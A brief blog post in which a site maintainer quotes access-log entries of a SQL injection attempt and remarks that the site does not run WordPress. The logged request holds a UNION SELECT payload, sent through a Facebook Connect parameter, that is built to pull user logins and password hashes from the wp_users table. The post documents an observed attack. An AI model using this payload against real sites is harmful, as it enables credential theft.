I just noticed an interesting SQL injection attempt on a site I maintain:
==> /var/log/httpd/access_log <== 109.86.210.25 - $domain.net - [21/Mar/2018:11:42:55 -0700] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 301 369 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36" 109.86.210.25 - www.$domain.net - [21/Mar/2018:11:42:56 -0700] "GET /?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9,10,11,12+from+wp_users-- HTTP/1.1" 301 373 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36"
Obviously a script kiddie as this particular site does not run wordpress.
Leave a Reply